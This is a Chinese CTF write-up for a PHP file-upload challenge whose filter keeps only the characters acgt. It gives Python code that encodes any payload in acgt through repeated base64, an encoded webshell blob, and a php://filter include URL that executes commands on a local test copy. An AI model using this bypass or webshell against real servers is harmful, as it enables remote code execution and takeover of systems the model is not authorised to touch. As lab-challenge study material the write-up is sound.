这个题的解法是王一航大佬给我的启发，可以膜一膜大佬的简书，真的很6
附链接：http://www.jianshu.com/u/bf30f18c872c

题目背景

这个题目可以通过php的伪协议直接读取到源码，难点就是源码里的正则过滤。本题将初acgt以外的所有字符全部去掉了。于是，我们无法上传正常的木马

<?php
error_reporting(0);
session_start();


if (isset($_FILES[file]) && $_FILES[file]['size'] < 65536) {
    $d = "./tmp/" . md5(session_id());
    @mkdir($d);
    $b = "$d/" . pathinfo($_FILES[file][name], 8);
    file_put_contents($b, preg_replace('/[^acgt]/is', '', file_get_contents($_FILES[file][tmp . "_name"])));
    echo $b;
}
?>

思路

看到王一航大佬在博客里提及用base64来解，恍然大悟。

base64特性

base64是有容错机制的，可以尝试一下
看下图

base64的容错

这个图，我们首先测试了一下aaaa作为base64编码时的源码是多少，我们可以在图中看到。
之后，我们测试了iiii作为base64编码时源码是多少。最后我们使用aaaaaaaaaaaaaaaa作为base64编码，发现源码和iiii相同。
这里，base64使用的字符只有64个，除了这64个字符外，其他字符在解码时会被忽略，也就是之前所谓的容错性
那么，利用这个特性，我们结合上面的例子，只能有a一个字符存在时，我们可以通过base64的解码，创造出i,以此类推，当解码次数增多时，就可以通过极少的字符，拓展到64个字符，进而实现一切文字的base64编码

实现

首先，我们先利用可以使用的acgtACGT来进行排列组合，来拓展字符，之后，反复利用，来达到目的

list_use = 'acgtACGT'
can_see = 'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789+/='



def make_list(list_now,id):
    result = ''
    with open("./list_"+id+".txt","a+") as f:
        for i in list_now:
            for j in list_now:
                for k in list_now:
                    for l in list_now:
                        sourlist = i+j+k+l
                        ordlist = sourlist.decode("base64")
                        for z in ordlist:
                            if z in can_see:
                                result += z
                        if len(result) == 1:
                            f.writelines(sourlist+"******"+result+"\n")
                        result = ''

这里，我贴了一个函数，编程方式采用了很简单，很粗暴的方式，将排列组合的所以内容写入文件。简单粗暴，易懂，虽然很low。。。。。。
之后，我们将文件里的内容整理一下，就是不要出现重复的拓展字符

def do_list(id):
    a_list = ''
    with open("./list_"+id+".txt","rb") as f:
        x = f.read()
        x = x.split('\n')
        for i in x:
            sour = i.split('******')
            #print i
            #print sour
            mid_1 = sour[0]
            mid_2 = sour[1][0]
            if mid_2 not in a_list:
                a_list += mid_2
                with open("./list_do"+id+".txt","a+") as fb:
                    fb.writelines(mid_1+"******"+mid_2+"\n")
    return a_list

同样简单粗暴，是不是很傻，很可爱。将整理完的文件另存

def change(id,ord_base):
    result = ''
    mid_1 = []
    mid_2 = []
    with open("./list_do"+id+".txt","rb") as f:
        x = f.read()
        x = x.split('\n')
        for i in x:
            sour = i.split('******')
            #print i
            #print sour
            mid_1.append(sour[0]) 
            mid_2.append(sour[1][0])
    for j in ord_base:
        num = mid_2.index(j)
        result += mid_1[num]
    return result

最后，这个就是转换的过程，就是从目标字符的base64编码，向下转换，直到只有acgt出现

结果

我得到了这个文件：

aaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatGgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaagatGaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaaaaagGcagTGaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaaTaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgattaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcTAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattgTaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaaAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgCtcaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaagGcagTGaaaaaaaaaaAaaaAaaaaaaaaaaaAaagatCaaaaaaaaaAaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaagatagCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgGaaaaaaaaaaaaaaaAaaagaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacAaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgGaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaaaaagGcagTGaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatCaaaaaaaaaAaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaagaaTAaaaaaaaaaagatGaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgGaaaaaaaaaaaaaaaAaaaAaaaaaaaaaaaAaacaaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaTaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtcgatTaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaacgaaaaaaaaaaaAaaaAaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagattaaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaagataaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagGtccaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaaaaaaAaaTaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatTaaaaaaaaaaaaaAaaaAaaaaaaaaaaaAaagTaaaaaaaaaaaAaagTaaaaaaaaaaaAaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaaTaaaaaaaaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaagatGgatGgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaagatTaaaaagaagatagCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaagatCgCtcaaaaaaaaaAaacaaaaaaaaaaaaAaaaaaaaaaaaaaaaAaaagaaaaaaagaagattaaaa

各位可以把它base64解码4次，就得到了我们需要的东西

解码4次

那么，这就完成了

解题

因为我主要去注意upload.php了，所以，没有保存其他的源码，本地复现，也就直接写个页面，include就行
那么我们将生成的文件名字设置为exp.php.txt，这点比较简单
上传上去就变成了exp.php

上传

然后在包含的页面，我们可以这样写
url如下：

http://127.0.0.1/2017xdctf/include.php?file=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=./tmp/8a1b5fc5f0fe17e9ba8538a991871371/exp.php

结果：

dir执行

可以看到，dir命令执行了